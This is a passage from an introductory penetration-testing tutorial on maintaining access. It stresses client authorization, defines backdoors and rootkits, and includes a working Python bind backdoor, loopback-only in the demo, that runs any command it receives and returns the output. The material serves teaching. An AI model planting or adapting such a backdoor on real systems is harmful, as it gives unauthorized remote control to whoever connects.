Introduction to pentesting: Maintaining Access with Backdoors and Rootkits

Introduction

Maintaining access to a remote system is a questionable activity that needs to be discussed with, and clearly explained to, the client. Many companies are interested in having a penetration test performed but are leery of allowing the penetration testing company to make use of backdoors. Most people are afraid that these backdoors will be discovered and exploited by an unauthorized third party. Imagine that you are the CEO of a company: how well would you sleep knowing that you may have an open backdoor channel into your network? Remember, the client sets both the scope and the authorization of the penetration test. You’ll need to take the time to fully cover and discuss this step before proceeding.

Still, on occasion you may be asked to conduct a penetration test that does require the use of a backdoor. Whether the reason is to provide a proof of concept or simply to create a realistic scenario in which the attacker can return to the target, it’s important to cover the basics of this step.

In the simplest sense, a backdoor is a piece of software that resides on the target computer and allows the attacker to return (connect) to the machine at any time. In most cases, the backdoor is a hidden process that runs on the target machine and allows a normally unauthorized user to control it.

It is also important to understand that many exploits are fleeting: they work and provide access only as long as the program that was exploited remains running. In many cases, if the target machine reboots or the exploited process is stopped, the shell will be lost. As a result, one of the first tasks to complete upon gaining access to a system is to migrate your shell to a more permanent home. This is often done through the use of backdoors.
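To make the definition concrete, here is a minimal bind-style backdoor in Python, written for this page as an added illustration; it is not code from the book or from any real backdoor or tool. It does exactly what the preceding paragraphs describe: a process of its own listens on a TCP port, accepts a connection from the "attacker", runs whatever command is sent, and returns the output. Because it is a separate process rather than a shell living inside an exploited program, it keeps answering after that program has been closed. It still does not survive a reboot on its own; arranging for it to be restarted automatically is a separate problem this example does not address. The function names, the 127.0.0.1 binding (so the demo never leaves the local machine) and the OS-assigned port are choices made for the example.

```python
"""Added example: a minimal loopback-only bind backdoor.

Target side: listen, accept, execute the command line received, send output.
Attacker side: connect, send a command, read the reply.
Everything is bound to 127.0.0.1 so the demo cannot be reached from elsewhere.
"""
import socket
import subprocess
import threading


def handle_client(conn: socket.socket) -> None:
    """Serve one connection: read one command line, run it, return its output."""
    with conn:
        data = conn.recv(4096)
        if not data:
            return
        cmd = data.decode("utf-8", "replace").strip()
        try:
            # shell=True is the whole point of a backdoor: it runs what it is told.
            result = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
            output = result.stdout + result.stderr
        except subprocess.TimeoutExpired:
            output = b"[command timed out]\n"
        conn.sendall(output)


def start_backdoor(host: str = "127.0.0.1", port: int = 0):
    """Start the listener in a background thread.

    port=0 lets the OS pick a free port (assumption for the demo; a real
    backdoor would use a fixed, agreed port). Returns (server_socket, port).
    Closing the returned socket stops the accept loop.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    bound_port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            try:
                conn, _addr = srv.accept()
            except OSError:  # server socket closed: stop serving
                break
            threading.Thread(target=handle_client, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv, bound_port


def run_remote(host: str, port: int, cmd: str, timeout: float = 15.0) -> str:
    """Attacker side: connect to the backdoor, send cmd, collect the full reply."""
    with socket.create_connection((host, port), timeout=timeout) as c:
        c.sendall(cmd.encode("utf-8") + b"\n")
        c.shutdown(socket.SHUT_WR)  # tell the server we are done sending
        chunks = []
        while True:
            chunk = c.recv(4096)
            if not chunk:  # server closed the connection after replying
                break
            chunks.append(chunk)
    return b"".join(chunks).decode("utf-8", "replace")


if __name__ == "__main__":
    server, listening_port = start_backdoor()
    print(f"backdoor listening on 127.0.0.1:{listening_port}")
    print(run_remote("127.0.0.1", listening_port, "echo hello from the target"), end="")
    server.close()
```

Run it once to see the round trip: the listener answers a command, and it would keep answering new connections regardless of whatever program was originally exploited to plant it. That independence from the exploited process is the property the paragraph above is after when it talks about moving a shell to a more permanent home.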

Later in the chapter, we’ll discuss rootkits. Rootkits are a special kind of software that embeds itself deep in the operating system and performs a number of tasks, including giving a hacker the ability to completely hide processes and programs.